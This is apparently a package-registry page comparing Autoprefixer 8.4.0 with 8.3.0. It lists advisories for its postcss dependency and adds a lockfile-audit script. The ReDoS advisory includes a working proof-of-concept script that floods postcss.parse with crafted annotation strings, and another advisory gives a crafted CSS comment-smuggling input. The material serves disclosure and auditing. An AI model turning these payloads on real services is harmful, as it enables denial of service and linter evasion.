Autoprefixer is a powerful PostCSS plugin that automatically adds vendor prefixes to CSS rules, ensuring cross-browser compatibility based on data from Can I Use. Comparing versions 8.4.0 and 8.3.0 reveals subtle but potentially impactful changes for developers. Both versions share the same core functionality: parsing CSS, applying prefixes based on browser support, and utilizing dependencies like num2fraction, normalize-range, and postcss-value-parser. They also both have the same license, repository, author and number of files.
The key differences lie in the updated dependencies. Version 8.4.0 bumps postcss from ^6.0.21 to ^6.0.22, browserslist from ^3.2.4 to ^3.2.6, and, most notably, caniuse-lite from ^1.0.30000830 to ^1.0.30000832. These updates suggest fixes in PostCSS parsing, refined browser target selection through Browserslist, and more recent browser compatibility data from Can I Use. Users may see slightly more accurate prefixing and support for newer CSS features with the newer version. The unpacked size also grew slightly, from 328588 to 329448 bytes, which reflects the additional data shipped in this release. Developers should therefore consider upgrading to version 8.4.0 to benefit from the latest browser support information and any performance improvements in the updated dependencies, with minimal risk of breaking changes.
All vulnerabilities related to version 8.4.0 of the package
Regular Expression Denial of Service in postcss
The package postcss, in versions before 7.0.36 or between 8.0.0 and 8.2.13, is vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
Autoprefixer 8.4.0 depends on postcss ^6.0.22, which falls inside the affected range. The following proof-of-concept script measures how parse time grows with the number of repeated annotation prefixes in the input:
var postcss = require("postcss")

// Build a stylesheet followed by n repetitions of the source-map annotation
// prefix, terminated by "!" instead of a closing "*/".
function build_attack(n) {
    var ret = "a{}"
    for (var i = 0; i < n; i++) {
        ret += "/*# sourceMappingURL="
    }
    return ret + "!";
}

// Warm-up parse of a well-formed annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse progressively longer inputs and report how long each one takes.
for (var i = 1; i <= 500000; i++) {
    if (i % 1000 == 0) {
        var time = Date.now();
        var attack_str = build_attack(i)
        try {
            postcss.parse(attack_str)
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        } catch (e) {
            var time_cost = Date.now() - time;
            console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
        }
    }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
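Both advisories above concern the postcss dependency rather than Autoprefixer itself, so the practical check for a project is which postcss version(s) its lockfile actually resolves, including nested copies pulled in by a dependency such as autoprefixer 8.4.0 with its "postcss": "^6.0.22" requirement. The JavaScript below is added here as an illustration; it is not taken from the advisories or from the PostCSS or Autoprefixer projects. It audits a package-lock.json object against the version ranges quoted above. The lockfile contents are constructed, and the reading of "between 8.0.0 and 8.2.13" as 8.0.0 <= v < 8.2.13 (8.2.13 being the fix release) is an assumption made for the example.

```javascript
// Added example (not part of the advisories or of PostCSS/Autoprefixer): find every
// resolved postcss copy in a package-lock.json object and report which of the two
// advisories above still apply to it. Ranges are taken from the advisory text; the
// lockfile below is constructed for illustration.

function parseVersion(v) {
  // Accept "6.0.22", "v6.0.22" or "^6.0.22"; prerelease/build tags are ignored.
  const m = /^[v^~]?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error("not a semver version: " + v);
  return [Number(m[1]), Number(m[2]), Number(m[3])];
}

function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa[i] !== pb[i]) return pa[i] < pb[i] ? -1 : 1;
  return 0;
}

// Vulnerable ranges as [lowInclusive, highExclusive]; the upper bound is the fix release.
// Assumption: "between 8.0.0 and 8.2.13" in the ReDoS advisory means 8.0.0 <= v < 8.2.13.
const POSTCSS_ADVISORIES = [
  { id: "ReDoS in lib/previous-map.js",
    ranges: [["0.0.0", "7.0.36"], ["8.0.0", "8.2.13"]] },
  { id: "\\r line-return parsing discrepancy",
    ranges: [["0.0.0", "8.4.31"]] },
];

function inRange(version, [low, high]) {
  return compareVersions(version, low) >= 0 && compareVersions(version, high) < 0;
}

// Ids of the advisories whose ranges contain the given postcss version.
function advisoriesFor(version) {
  return POSTCSS_ADVISORIES
    .filter(a => a.ranges.some(r => inRange(version, r)))
    .map(a => a.id);
}

// Walk a package-lock.json object (lockfileVersion 2/3 "packages" map, or the
// lockfileVersion 1 nested "dependencies" tree) and collect every postcss copy.
function findPostcssVersions(lock) {
  const found = [];
  if (lock.packages) {
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path.endsWith("node_modules/postcss") && entry.version) {
        found.push({ path, version: entry.version });
      }
    }
    return found;
  }
  const walk = (deps, prefix) => {
    for (const [name, entry] of Object.entries(deps || {})) {
      const path = prefix + "node_modules/" + name;
      if (name === "postcss" && entry.version) found.push({ path, version: entry.version });
      walk(entry.dependencies, path + "/");
    }
  };
  walk(lock.dependencies, "");
  return found;
}

// One report row per resolved postcss copy.
function auditLock(lock) {
  return findPostcssVersions(lock).map(({ path, version }) =>
    ({ path, version, advisories: advisoriesFor(version) }));
}

// Constructed lockfile (lockfileVersion 2 shape): the app itself pins a fixed postcss,
// but autoprefixer 8.4.0's "postcss": "^6.0.22" resolves to a nested 6.x copy.
const SAMPLE_LOCK = {
  lockfileVersion: 2,
  packages: {
    "node_modules/postcss": { version: "8.4.31" },
    "node_modules/autoprefixer": { version: "8.4.0", dependencies: { postcss: "^6.0.22" } },
    "node_modules/autoprefixer/node_modules/postcss": { version: "6.0.22" },
  },
};

for (const row of auditLock(SAMPLE_LOCK)) {
  console.log(row.path, row.version, row.advisories.length ? row.advisories : "no known advisory");
}
```

The point of walking the whole lockfile rather than checking only the top-level postcss entry is that a fixed top-level version says nothing about nested copies: in the constructed lockfile the application's own postcss 8.4.31 is clear of both advisories while the 6.0.22 copy nested under autoprefixer still matches both.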